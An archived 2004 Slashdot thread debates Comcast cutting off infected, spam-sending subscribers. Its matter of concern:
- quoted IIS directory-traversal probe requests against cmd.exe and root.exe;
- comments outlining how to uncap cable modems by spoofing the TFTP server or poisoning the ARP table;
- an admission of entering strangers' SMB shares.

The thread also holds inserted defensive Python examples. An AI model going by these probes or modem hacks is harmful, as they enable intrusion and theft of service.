Security Spam The Internet

Comcast Cuts Infected PCs' Network Connections 592

fidget42 writes "I just noticed this article over at Infoworld. It seems that Comcast is finally doing something about the machines on their network that are being used by spammers. They are now cutting off service to those customers who have computers that have been hijacked by spammers. Now, if only other broadband ISPs would start policing their user base ..."
This discussion has been archived. No new comments can be posted.

  • Cox does this... (Score:5, Informative)

    by h0mer ( 181006 ) on Wednesday March 10, 2004 @09:08AM (#8520048)
    I know anecdotal evidence is pretty much worthless, but my friend got infected with all sorts of nasty ad/malwares, along with Blaster and a couple other worms. Cox deactivated his cable modem, he had to call them and go through phone hell to get his service back. So I'm not really sure it's only Comcast doing this.
  • Happened to me. (Score:3, Informative)

    by Anonymous Coward on Wednesday March 10, 2004 @09:12AM (#8520077)
    I had a machine on AT&T (now Comcast) that was infected by a worm. Bummer. I'll tell you, you have to keep up with those service packs even if you're going to directly connect to the network for "just a few hours".

    Anyhow, my friends at AT&T Broadband (the ones that never answered their phone) sent me a nastygram telling me that I was doing a bit too much port scanning for their liking (duh...)

    So I ripped the machine off the network and poked around. Yep, it turned out that my machine was infected a few hours after I installed the OS, and it was doing its bad thing for WEEKS.

    At the time, AT&T just "informed me" that I should stop doing bad things. I think it would have been prudent for them to kill my service until I took corrective action.

    Of course, this was 3 years ago or so... a more innocent time...
  • Re:Is this right? (Score:2, Informative)

    by Depili ( 749436 ) on Wednesday March 10, 2004 @09:24AM (#8520179)
    Well, many Finnish ISPs offer bundle deals on AV and firewall software with their connections, and at least the campus network of Helsinki University of Technics cuts infected machines. [www.hut.fi] And IMO cutting spam drones is the right thing to do, but determining what is infected and what ain't can be a little tricky at times.
  • by SignalFreq ( 580297 ) on Wednesday March 10, 2004 @09:25AM (#8520180)
    Here [comcast.net] is Comcast's Terms Of Service.

    From the AUP:
    Note: Comcast reserves the right to immediately terminate the Service and the Subscriber Agreement if you engage in any of the prohibited activities listed in this AUP or if you use the Comcast Equipment or Service in a way which is contrary to any Comcast policies or any of Comcast's suppliers' policies. You must strictly adhere to any policy set forth by another service provider accessed through the Service.

    So they can terminate service, based on violation of the subarticles:

    (vii) restrict, inhibit, or otherwise interfere with the ability of any other person, regardless of intent, purpose or knowledge, to use or enjoy the Service, including, without limitation, posting or transmitting any information or software which contains a worm, virus, or other harmful feature, or generating levels of traffic sufficient to impede others' ability to send or retrieve information;

    And transmitting a virus is definitely a violation. Still, it would be nice if there was more information on what will cause them to pull the plug.

  • by mikeophile ( 647318 ) on Wednesday March 10, 2004 @09:25AM (#8520191)
    Take a look at this site [netwide.net] and you will be able to imagine it quite easily.
  • by Xystance ( 660413 ) on Wednesday March 10, 2004 @09:25AM (#8520192) Homepage
    Oh come on now...

    As much as I love OS X (sitting on it right now), it is not "infection-proof".

    BSD/OS X is just as vulnerable to hacking as any other Unix system if left unpatched and unmaintained.

    Just because there hasn't been a working worm written for BSD/OS X doesn't mean there won't be one.

    PLUS, -just- having an updated AntiVirus doesn't solve the problem! It's the patch level too, it's the non-configured software or hardware firewalls, it's the complete dearth of knowledge of the basics of computer security! Everyone has to learn to drive, so everyone has to learn to keep things at a baseline level of security.

    Why don't you do your part and instead of calling people stupid, educate those you know, and tell them to educate others?
  • Re:Nice but... (Score:3, Informative)

    by Flashbak ( 684750 ) on Wednesday March 10, 2004 @09:31AM (#8520239)
    Why would you need to send test email, be they viruses or spam, via your ISP's network? If you need to test filters or anti-virus configuration on your mail server do it locally - surely that's the responsible thing to do. I wouldn't want to propagate a virus, even the eicar test virus, outside of the networks I directly control. (Yes, I'm well aware the eicar test is benign, but that's not the point.)
  • Re:Nice but... (Score:4, Informative)

    by caino59 ( 313096 ) on Wednesday March 10, 2004 @09:33AM (#8520251) Homepage
    this is for the people's machines that are constantly trying to hit other machines and infect them....

    you know, where you see stuff like this recurring in your web server's logs...offending ip removed...

    .client.comcast.net - - [09/Mar/2004:14:43:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 332

    .client.comcast.net - - [09/Mar/2004:14:43:56 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 332

    .client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 346

    .client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 346

    .client.comcast.net - - [09/Mar/2004:14:43:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356

    .client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 376

    .client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 376

    .client.comcast.net - - [09/Mar/2004:14:43:58 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1941

    .client.comcast.net - - [09/Mar/2004:14:43:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

    .client.comcast.net - - [09/Mar/2004:14:43:59 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1941

    .client.comcast.net - - [09/Mar/2004:14:44:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

    .client.comcast.net - - [09/Mar/2004:14:44:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357

    .client.comcast.net - - [09/Mar/2004:14:44:01 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 337

    .client.comcast.net - - [09/Mar/2004:14:44:01 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 337

    .client.comcast.net - - [09/Mar/2004:14:44:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356

    .client.comcast.net - - [09/Mar/2004:14:44:02 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356

    the people they are cutting off are sending out daily attacks to multiple machines, not just once or twice sending out crap here and there. i think you'll be ok.
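
    Added example, not part of the comment above: one way a web server operator could pick hosts like this out of an access log, by percent-decoding each request path until it stops changing and counting requests for cmd.exe or root.exe per client inside a short time window. The host names, thresholds and function names are assumptions, and the sample log is constructed (the request paths follow the ones quoted above).

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Common Log Format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# A request whose path component ends in cmd.exe or root.exe, as in the quoted log.
PROBE_RE = re.compile(r'(?:^|[/\\])(?:cmd|root)\.exe(?:\?|$)', re.IGNORECASE)


def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so double encoding (%255c -> %5c -> backslash) is undone."""
    for _ in range(max_rounds):
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path = decoded
    return path


def find_scanners(lines, min_hits=5, window_seconds=60):
    """Return {host: max probes seen inside any window} for hosts at or above min_hits."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a Common Log Format line
        if PROBE_RE.search(decode_fully(m["path"])):
            hits[m["host"]].append(
                datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))

    flagged = {}
    for host, stamps in hits.items():
        stamps.sort()
        start = best = 0
        # Sliding window: largest number of probes within window_seconds.
        for end, ts in enumerate(stamps):
            while (ts - stamps[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_hits:
            flagged[host] = best
    return flagged


# Constructed sample: one scanning host, one ordinary visitor, one single stray probe.
SAMPLE_LOG = """\
cpe-a.example.net - - [09/Mar/2004:14:43:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 332
cpe-a.example.net - - [09/Mar/2004:14:43:56 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 332
cpe-a.example.net - - [09/Mar/2004:14:43:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 346
cpe-a.example.net - - [09/Mar/2004:14:43:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 356
cpe-a.example.net - - [09/Mar/2004:14:43:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 357
cpe-a.example.net - - [09/Mar/2004:14:44:01 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 337
cpe-b.example.net - - [09/Mar/2004:14:45:10 -0500] "GET /index.html HTTP/1.0" 200 5120
cpe-b.example.net - - [09/Mar/2004:14:45:12 -0500] "GET /files/readme.txt?name=cmd.exe HTTP/1.0" 200 812
cpe-c.example.net - - [09/Mar/2004:15:02:00 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1941
"""

if __name__ == "__main__":
    for host, count in find_scanners(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: {count} probes within 60 seconds")
```

    Only the first constructed host is reported; a single stray request or a query string that merely mentions cmd.exe stays below the threshold.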

  • Re:Or maybe... (Score:3, Informative)

    by Chalybeous ( 728116 ) <chalybeous@@@yahoo...co...uk> on Wednesday March 10, 2004 @09:46AM (#8520343) Homepage Journal
    Grandparent has a fair point, but parent reflects the situation where I am.
    I use my university's network for internet access, paying UK£60 a year for access in my room. At the start of the year there were a lot of virus-related problems, mostly people bringing machines in from home and plugging them in without a firewall or AV software.
    Network Services don't insist on this. They don't insist on a virus scan first. What they DO do is cut you off if your PC is causing a nuisance to the network, because they're only three men taking care of the main servers and staff terminals (public terminals are someone else's responsibility).
    A lot of people whine about it, but IMHO it's fair policy. They're busy enough without having to help the blissfully clueless. That said, it wouldn't kill them if your £60 included a CD with, say, ZoneAlarm and AVG on... (I distributed similar CDs to friends, with Mozilla Firebird, just so they didn't pick up anything nasty.)

    The moral of the story: well, there are two. The first is "You're paying us for the service, not for us to hold your hand and show you how to use your computer." The second is that some people really need to be beaten around the head with a clue-by-four.
  • Adelphia (Score:3, Informative)

    by Anonymous Coward on Wednesday March 10, 2004 @09:49AM (#8520362)
    The ISP I work for (Adelphia, thus Anon :) ) is working on a way to handle customers like these.

    -First, the customer is identified, then placed into a 'walled zone'.
    -This walled zone will route/allow the cable modem to go only to one specific location, a certain web page in this case.
    -Said web page will include downloads for virus fixes and such. Customer goes there, downloads, and cleans up his computer.
    -When it has been verified that the customer has gone there and cleaned up, they check his system, then reactivate his account.

    To me it seems like a pretty nifty way of stopping virus spreading while keeping the customer informed of what's going on.
  • We do this (Score:3, Informative)

    by PhraudulentOne ( 217867 ) on Wednesday March 10, 2004 @09:53AM (#8520396) Homepage Journal
    I administer a large DSL/dialup userbase and I monitor upstream bandwidth as much as I can. If I notice a DSL customer that has 100% of their upstream bandwidth used I usually check the traffic to see if it's email. I will notify the customer and give them a day or two to rectify the problem. If the problem is not fixed within 48 hours I will disable that PVC which will effectively drop sync from the user's modem. When the customer comes home, they are now forced to fix the problem. I try to explain to them as politely as possible that they are contributing to the junk mail problem that they are always complaining about and that we had to disable their connection to prevent this. Most people understand and the lack of internet connection gives them the initiative to get up and go purchase some AV software and to run Spybot or some similar program. They phone back once their computer is clean and I turn the circuit back on.
  • by roystgnr ( 4015 ) <roy&stogners,org> on Wednesday March 10, 2004 @10:36AM (#8520710) Homepage
    Frankly those users have ignored all the obvious aspects of being infected (100% cable light flashing)

    My cable light has been flashing intermittently ever since the latest Windows worm. It's not because my (Fedora Linux) computer is infected, it's because every other infected computer on the net is periodically scanning my entire block of IP addresses. Every time they try to infect an unused address in that block, our helpful routers send an ARP packet to every cable modem user. I've seen more than a hundred per second during bad periods.

    Maybe DSL users (who don't have to share the same bandwidth with everyone in their neighborhood) or users at smarter cable modem companies (who could be caching these things a bit longer, not sending out ARP requests for the same IP address every few seconds) would see a difference if they were infected by a virus, but at least Road Runner Austin users are probably all used to constantly flickering cable modem lights by now.
  • by andy landy ( 306369 ) <aplandells@h[ ]ail.com ['otm' in gap]> on Wednesday March 10, 2004 @10:49AM (#8520832) Homepage
    Some ISPs worth their salt do this already. I had a mate (who uses the same ISP that I do) and got disconnected as one of his housemates got a spam-relay trojan.

    They had no hesitation reconnecting him once he'd fixed the problem, but the fact is that they noticed and acted.

    The ISP in question is Eclipse Networking (UK) who are a really good ADSL supplier. (I've got 8 public IPs and reverse-DNS)

    It would be good if more ISPs took the time to sort this stuff out, often it's people who don't even know their machine has been hijacked.
  • by drinkypoo ( 153816 ) <drink@hyperlogos.org> on Wednesday March 10, 2004 @10:51AM (#8520852) Homepage Journal
    Unless you have supplied the cable modem, this only works when your cable provider is stupid. I worked for Cisco (interesting that their name crops up so many times on that page) and I happen to know that as they shipped the software to their licensees (among them Sony and Samsung) it looks for a configuration file only on the cable interface, and never on the ethernet, so in order to hijack the modem you would need your own cable head end (Cisco calls them a uBR) and an up-converter, and you would have to hook it up to that head end at least every time you started it up.

    Now, most cable modems have solder pads for a diagnostic connector, which is usually a 3 wire RS-232 serial connection. Sometimes it uses an unusual voltage, and you need a little box to change the levels. If you got access to the diagnostic connector, and your modem had the proper flash image in it, then you could program it through the diagnostic interface.

    I can imagine that some modems you purchase from Fry's or what have you will look for config on ethernet, though I doubt many of them do.

    For more insight on why this typically won't work, the default route on the device typically points to the cable interface, or does not exist if the cable interface is not hot, and the device has two modes of operation with regard to IP addresses on the internal interface; either it sets itself to 192.168.100.1, or it sets itself to whatever the config file tells it, and it starts proxying DHCP requests. Either way it is not going to be able to find your bogus TFTP server on the network unless it is badly misconfigured to begin with.

  • by drinkypoo ( 153816 ) <drink@hyperlogos.org> on Wednesday March 10, 2004 @10:53AM (#8520872) Homepage Journal
    NAV didn't protect people from Novarg A anyway, what is forcing people to install it supposed to accomplish?
  • by MobyDisk ( 75490 ) on Wednesday March 10, 2004 @11:09AM (#8521014) Homepage

    The problem here is that Comcast is shutting down people's connections with no recourse to find out why or to re-enable it.

    I received an email and an automated phone call from Comcast stating that I had an infected computer and I must clean it up. I was immediately pleased that they noticed, but frustrated that I could be infected. 5 PCs with varying OSs, all with firewalls and/or antivirus software, so I thought it was unlikely but possible. After doing a full scan I found no viruses.

    So I called Comcast's 800 number. They said I need to call a different long-distance number. That number is an automated system with nothing but dead ends. If I select the option about "Viruses and spam emails" then it tells me to email abuse at comcast.net if I get a bad email. But I don't want to report a spam, I received a report. All the options did approximately the same thing: Told me something I already know then hung up. Several calls later, I used the "leave a message" option. A week goes by and I received no call back. I replied to the email but received no response. Nobody on the service number would talk to me about it.

    So I receive another email telling me that my service may be disabled if I don't fix the problem. So what do I do now?

    To top it off, this isn't the first time. About 8 months ago, Comcast called and told me I was reported for sending spam. When they read me part of the SpamCop report (which they refused to do many times) it turned out to be a SpamCop report that my roommate made! We _reported_ the spam, we didn't _send_ it! After much arguing, the guy finally got it and left us alone. Mistakes happen, but what irks me the most is that they wanted to tell me I sent a spam, and make sure I corrected my behavior, but refused to tell me the source of the report, or what the email was, or when it was sent, or anything!

    Below is the email Comcast sent me. It looks like a form email, with no specific statement about what went wrong.

    ***PLEASE READ FULLY***

    Comcast has received complaints about your computer. We believe it may be:

    * Infected with a virus

    * Sending "spam" email that you are unaware of

    * Allowing spammers to use your connection to send their spam

    * Trying to infect other computers on the Internet with viruses

    The health of your computer is your responsibility. Consult your computer's manufacturer if you are unable to remedy the situation.

    ***************
    EXPLANATION
    ***************

    This message was sent by the Comcast Network Abuse and Policy Observance Team. We investigate reports of Internet Abuse by our customers. We have received such a report identifying your computer.

    The complaint(s) we have received were from other users of the Internet, who are receiving email from you, which they did not request. We understand that you may not be aware of any such email, and you will not see it in your normal email program.

    Typically these types of emails are caused, or are allowed to be sent by, viruses. They are either trying to infect other user's computers, or they allow spammers to connect to YOUR computer to send their spam.

    If you have anti-virus software on your computer, we recommend visiting the manufacturer's website to update it, as it may be out of date and unable to find the virus that's causing the problem. New viruses come out frequently, so it is important to update the software often, or automatically if possible. We also recommend a security software solution, such as a firewall to further restrict access to your system. Firewalls help to prevent such activity by allowing only the software and transactions that you choose to utilize your Internet connection.

    If you are deliberately sending these emails, we ask you to stop. Further complaints will require us to suspend or even terminate your service.

    If you have further questions or would like to notif

  • I work for Comcast (Score:4, Informative)

    by ironicsky ( 569792 ) on Wednesday March 10, 2004 @11:14AM (#8521057) Homepage Journal
    I agree with our cut-off policy for people infected with worms. Right now, we're not actually terminating their service, we're just blocking their SMTP and POP access so they cannot transmit viruses. In the rare case, our system will disable a customer's account if they are transmitting a virus.

    But, users are dumb, and I'll agree with that. Last summer when the Blaster worm came out, we emailed our customers ahead of time telling them they need to download the Microsoft patch.

    On top of that, the Microsoft Windows Update popup that comes up by default, once a week, users still continue to ignore it because they don't know what it does.

    Personally, I'd like to see more of this type of internet policing by ISPs. They should also be blocking people who have open SMB shares on their Windows Networks. I can't count the number of times I've purposely gone into someone's SMB share and dropped a text file telling them how to fix it.

    I, however, disagree with the Government policing of the internet. I believe the internet should be policed by the people who pay for it to be there. That would be us and the ISPs.

  • Re:Yes Yes! (Score:5, Informative)

    by GreyPoopon ( 411036 ) <[gpoopon] [at] [gmail.com]> on Wednesday March 10, 2004 @11:20AM (#8521111)
    While it is good that Comcast is doing something about the problem, this is a bad solution to the problem.

    We as the People-Who-Know need to be spending time helping those who don't to become self-reliant, rather than telling them 'Sorry. You can't access the net until you clean up your system. Sorry, I can't really help you do it. Call someone else.'

    Comcast is already doing this. From the article:

    "Comcast says that it is aware of the problem, is alerting customers who were hacked and helping them secure their computers."
    So, they block their access to trigger the support call, and then help them secure their machine. I think this is the right approach.
  • Re:Nice but... (Score:4, Informative)

    by DR SoB ( 749180 ) on Wednesday March 10, 2004 @11:37AM (#8521269) Journal
    No it's not, that's some bozo trying to "root" your machine. That's a traverse directory attack they are attempting. It happens all day, every day, and it's NOT what Comcast is going after. Webserver logs show you who is trying to connect to your WEBSITE, it has NOTHING to do with SPAM. If you want to see who these bozos are just look at the header of your spam email and do a TRACERT (or TRACEROUTE) to their IP address and see if it's a Comcast subnet (or names resolve...). It may be a cheap virus, it may be some hacker's scanning tool, but most Comcast customers are not running old versions of IIS (which is what they are trying to infect by the weblog you posted). Check out the Security Focus website for more information.
  • Re:Bad Idea (Score:1, Informative)

    by Anonymous Coward on Wednesday March 10, 2004 @11:59AM (#8521474)
    Comcast already has the infrastructure in place to do something like this. When you first plug your cable modem into their network you are assigned a regular IP address from their DHCP servers. However, DNS is routed to a special registration page where you have to enter your account number and an activation code to register your modem on their network before full connectivity is allowed.
  • Blues Brothers (Score:5, Informative)

    by lonesome phreak ( 142354 ) on Wednesday March 10, 2004 @12:10PM (#8521579) Journal
    It's a reference to the Blues Brothers, one of the greatest movies ever made. If you haven't seen it then you just don't understand the blues.

    Jake: "Hey what's goin' on?"
    Cop: "Oh those bums won their court case so they're marching today"
    Jake: "What bums?"
    Cop: "The fucking Nazi party!"
    Jake: "Illinois Nazis"
    Elwood: "I hate Illinois Nazis!"
  • by wmt ( 670536 ) on Wednesday March 10, 2004 @01:07PM (#8522143)
    http://www.senderbase.org/?searchString=comcast.net&searchBy=domain [senderbase.org]

    Magnitude 6 = 1 million emails/day

  • by ookabooka ( 731013 ) on Wednesday March 10, 2004 @01:10PM (#8522161)
    I dunno, I hacked my cable modem just through the ethernet port, it's a Motorola Surfboard something (4600? not too sure about the number, not at home). For those of you who are skeptical I will give you a brief overview of what I did. I first found out what the IP was for the TFTP server on Comcast for their cfg file, something like 10.32.14.1. I then used a tftp client on my computer and downloaded their config files and MD5 encryption keys (I think I had to set my computer's IP to that of my cable modem to do it, another 10.32 IP). Then I just set my comp's IP to their tftp server's IP, and set up a tftp server (after modding the config files of course, I had the encryption key in hand, so this wasn't difficult). Rebooted my cable modem using the http interface, about 50% of the time it would correctly load from my tftp, the other 50% from their tftp. Had 1500kb/sec down, 700kb/sec up. . . after about 2 months Comcast caught me and gave me a slap on the wrist, no job offer though :(, they realized there was a hog on their network, and checked their modem's config files. . . mine was a tad suspicious :) Everyone I have told this to yells at me for being a liar and that you really can't do it. . . I don't know why it went through the ethernet, but it did, perhaps the newer modems don't, but mine does. I feel like Einstein. . . the universe does too expand.

    Getting to the topic, it would be possible for me to write a program to do that all automatically, but it would be extremely ornate, and probably not worth the trouble.
  • by runderwo ( 609077 ) <runderwo@mail.wi ... rg minus painter> on Wednesday March 10, 2004 @02:12PM (#8522957)
    You can argue from authority all day long, but you're still wrong. The Surfboard series (at least those manufactured up until 2002) were vulnerable to an ARP poisoning attack.

    I verified this myself. Set up a TFTP server on an interface with the same IP address as the headend. Then as you reboot the modem, be constantly pinging the modem's HFC IP address through the spoofed interface you created. The cable modem, when it comes up, will then try to TFTP its config file from YOUR machine and not the headend, because you have injected your MAC address into its ARP table for that IP address.

    The encryption on the configuration file wasn't a big deal either, because you could get most of the needed information via SNMP IIRC. Most ISPs now disable SNMP and have bots scanning for connections where the actual speed doesn't match the account information.

  • Re:Yes Yes! (Score:1, Informative)

    by Anonymous Coward on Wednesday March 10, 2004 @02:25PM (#8523149)
    Well, this IS insightful, but you were TROLLED. Don't feed the trolls!

  • Other Companies (Score:1, Informative)

    by Anonymous Coward on Wednesday March 10, 2004 @04:46PM (#8524730)
    FYI, I am posting AC for a reason. The company I work for does roll-outs and tech support for small cable companies. Scripts are in place to automatically deactivate accounts with high upload/download bandwidth (meaning trojan p2p programs) and techs monitor e-mail usage. Problem with an account? Notify account holder and de-activate account. If the account holder can't be notified, the account is de-activated anyways.

    It's time people start taking responsibility for their actions when using a computer. Computers need to be patched frequently with Windows Update [microsoft.com]. AntiVirus programs such as Norton Antivirus [symantec.com], McAfee VirusScan [mcafee.com], or Trend Micro PC-Cillin [trendmicro.com] (my personal favorite) are needed with updates and scans run, at the very least, weekly. Computers also need anti-trojan programs such as The Cleaner [moosoft.com] and anti-spyware programs such as Spybot Search & Destroy [safer-networking.org] and Adaware [lavasoft.de]. Even go as far as not to use the default Internet programs, Internet Explorer [microsoft.com] and Outlook Express [microsoft.com]. Instead, use free, open source programs such as Mozilla Firefox (browser) [mozilla.org] and Thunderbird (e-mail) [mozilla.org].

    Naturally, the majority of people on /. know this, but we need to spread the word.
  • Re:Cox does this... (Score:2, Informative)

    by marmstro ( 533782 ) on Wednesday March 10, 2004 @06:29PM (#8525949) Homepage
    Yup, Cox cut off my cable modem once for having port 25 opened for relay (shame on me, I did a temporary port forwarding to Cox's email server because my normal SMTP server was down, and forgot to un-forward it). I ended up talking to a good tech support person (the good ones are only available after normal business hours) and I fixed the problem, he port scanned me, and turned me back on.
  • Yahoo gets the prize (Score:2, Informative)

    by BalloonMan ( 64687 ) on Wednesday March 10, 2004 @06:40PM (#8526087) Homepage Journal
    I'm a Comcast subscriber and a supporter of DShield, so I have a pretty good idea of the problems at Comcast and I'm glad to see Comcast getting more aggressive about stomping infected machines.

    However, SenderBase says Yahoo's 6 MTA's are all in the top 10 senders of e-mail. Only XO Communications and thehdhd.com out-send them. thehdhd.com (at #6) seems to be openly dedicated to producing spam.

    So, when will Yahoo clean up its act? Is it even possible for them to take the same kind of stance that Comcast is?
  • by morethanapapercert ( 749527 ) on Wednesday March 10, 2004 @10:43PM (#8528219) Homepage
    I work tech support for a major cable ISP and my employer, at least, DOES police its customers (albeit with a light hand). There are four basic ways an account gets disabled or throttled (aside from the obvious non-payment):

    1. An e-mail account attempts to send more than a certain, but undisclosed, number of e-mails within a 12 hour period. Result: SMTP server rejects all further e-mails from source for 24 hours.
    2. Infected e-mails are traced back to a customer's computer. Result: customer given a warning e-mail from the security dept and a very short deadline. Failure to get cleaned results in ALL internet access being disabled.
    3. If a customer keeps maxing out bandwidth, the local office has the choice of either dialing down the access or disabling the modem completely.
    4. If a technician spots the fact that a customer's modem is not using a bin file appropriate to the account (a fact which can be scanned for automatically with DOCSIS 2.0 compliant modems).

    When the ISP decides to disable an account, the most common way is indeed to send an updated disabled.bin file to the modem; however, it is possible to "de-provision" a modem. Essentially, the CMTS at the headend gets told that the MAC ID does not have permission to get on the network. One final note: most DOCSIS 2.0 compliant modems will NOT accept an updated .bin file from the ethernet side....
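
    Added example, not part of the comment above and not any ISP's actual code: a sketch of the first rule it describes, counting accepted messages per sender over a 12 hour window and rejecting everything from that sender for 24 hours once the limit is exceeded. The limit value, class name and event data are assumptions, since the comment says the real threshold is undisclosed.

```python
from collections import defaultdict, deque

WINDOW = 12 * 3600   # counting period named in the comment: 12 hours
BLOCK = 24 * 3600    # rejection period named in the comment: 24 hours


class SenderThrottle:
    """Per-sender outbound mail limit with a fixed lockout after it is exceeded."""

    def __init__(self, limit):
        self.limit = limit                 # assumed; the real number is undisclosed
        self.sent = defaultdict(deque)     # sender -> timestamps of accepted mail
        self.blocked_until = {}            # sender -> time the lockout ends

    def accept(self, sender, now):
        """Return True if a message from sender at time now (seconds) is accepted."""
        until = self.blocked_until.get(sender)
        if until is not None:
            if now < until:
                return False               # still inside the 24 hour rejection
            del self.blocked_until[sender] # lockout over: start counting afresh
            self.sent[sender].clear()

        recent = self.sent[sender]
        while recent and now - recent[0] >= WINDOW:
            recent.popleft()               # forget mail older than the window

        if len(recent) >= self.limit:
            self.blocked_until[sender] = now + BLOCK
            return False
        recent.append(now)
        return True


def replay(events, limit):
    """Run constructed (sender, time) events through one throttle; return decisions."""
    throttle = SenderThrottle(limit)
    return [(sender, t, throttle.accept(sender, t)) for sender, t in events]


# Constructed events: "drone" bursts like an infected machine, "normal" sends slowly.
HOUR = 3600
EVENTS = [
    ("drone", 0), ("drone", 10), ("drone", 20), ("drone", 30),
    ("normal", 0), ("normal", 5 * HOUR), ("normal", 10 * HOUR),
    ("drone", 30 + BLOCK - 1),     # one second before the lockout ends
    ("normal", 13 * HOUR),         # first message has aged out of the window
    ("drone", 30 + BLOCK),         # lockout has ended
]

if __name__ == "__main__":
    for sender, t, ok in replay(EVENTS, limit=3):
        print(f"{sender:6} t={t:6d}s {'accepted' if ok else 'rejected'}")
```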
